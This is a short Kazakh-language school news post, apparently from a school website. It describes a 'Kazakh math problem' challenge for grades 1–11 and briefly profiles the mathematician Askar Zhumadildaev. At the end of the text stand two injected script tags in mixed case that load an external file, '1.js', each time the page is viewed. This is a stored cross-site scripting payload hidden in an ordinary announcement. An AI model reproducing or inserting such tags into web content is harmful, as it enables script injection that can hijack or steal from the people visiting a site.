Бүгін мектебімізде 1-11 сыныптар үшін "Қазақ есебі" челленджі өтті. «Тоғыз айға 9 іс-шара» тұжырымдамасы өскелең ұрпақты тәрбиелеудің ұлттық құндылықтарын қалыптастыру шеңберінде ай сайынғы іс-шараларды өткізуге бірыңғай көзқарасты қамтамасыз етуге бағытталған.Осыған орай, білім алушылардың математикалық және логикалық есептерді шығаруға деген қызығушылығын ояту,креативті және сыни ойлауын дамыту мақсатында «Қазақ есебі» челленджі бастау алды. Математика - барлық ғылымдар патшасы. Математикамен көптеген ғалымдар айналысқан. Еліміздегі үздік математиктердің бірі де бірегейі - Асқар Серқұлұлы Жұмаділдаев.Асқар Жұмаділдаев – белгілі қазақстандық ғалым және қоғам қайраткері, физика-математика ғылымдарының докторы, профессор, ҚР Ұлттық ғылым академиясының академигі. Бала кезінен математикаға құштар болған. Мектепте жүргенiнде талай қалалық, республикалық және бүкiлодақтық физика-математикаға қатысты жарыстарға қатысып, талай рет жүлдегер атанады.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
Просмотров: 383
